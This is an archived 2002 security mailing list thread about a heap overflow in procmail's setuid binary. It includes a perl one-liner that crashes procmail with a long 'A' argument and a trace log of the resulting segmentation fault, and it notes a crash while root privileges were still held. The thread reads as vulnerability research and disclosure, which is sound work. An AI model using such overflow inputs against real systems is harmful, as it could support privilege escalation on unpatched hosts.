Vulnerability Development mailing list archives

Re: procmail heap overflow

From: KF <dotslash () snosoft com>
Date: Wed, 19 Jun 2002 00:46:29 -0400

I believe we (one of our researchers "dvdman") were messing with this afew months back ... we never finished up out research ... heres what Ifound in an old strace log...


-KF


malloc(86)                                        = 0x0805e0c0
memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096)      = 0x0805e0c4
strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setuid(506)                                       = 0
setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0

strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) =0x0805c9c8

strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8
malloc(81)                                        = 0x0805e120
memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0)  = 2
memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0)  = 17
memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
write(2, "procmail: Exceeded LINEBUF\n", 27)      = 27
strchr("PROCMAIL_OVERFLOW=yes", '=')              = "=yes"

strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...,17) = 15strncmp("PROCMAIL_OVERFLOW=yes","EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"...,17 <unfinished ...>

--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

-KF


SpaceWalker wrote:

$ procmail -v
procmail v3.15.1 2001/01/08
$ procmail `perl -e '{print "A"x10240}'`=A
wait indefinitively
Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.

On Wed, 19 Jun 2002 02:38:08 +0200
flatline <flatline () blackhat nl> wrote:
hi,

i found a heap overflow in procmail (up until latest) some time ago.

flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x    1 root     mail        64344 Jun  3  2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$
at first it seemed to properly drop privs before segging, but not too longago i managed to make it crash while it still had euid 0.segfaults have been seen on red hat/slackware linux and bsd variants.successful exploitation has not been verified.
/ flatline
greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyonewho felt left out.

Current thread:

procmail heap overflow flatline (Jun 19)
- Re: procmail heap overflow Ryan W. Maple (Jun 19)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 19)
  - RE: procmail heap overflow Christopher Meiklejohn (Jun 19)
- Re: procmail heap overflow kam (Jun 19)
- Re: procmail heap overflow SpaceWalker (Jun 19)
  - Re: procmail heap overflow KF (Jun 19)
- <Possible follow-ups>
- RE: procmail heap overflow Peter Mueller (Jun 19)
  - Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
    - Re: procmail heap overflow Przemyslaw Frasunek (Jun 21)
- RE: procmail heap overflow Wodahs Latigid (Jun 20)
- Re: procmail heap overflow Skot (Jun 20)
- RE: procmail heap overflow Peter Mueller (Jun 20)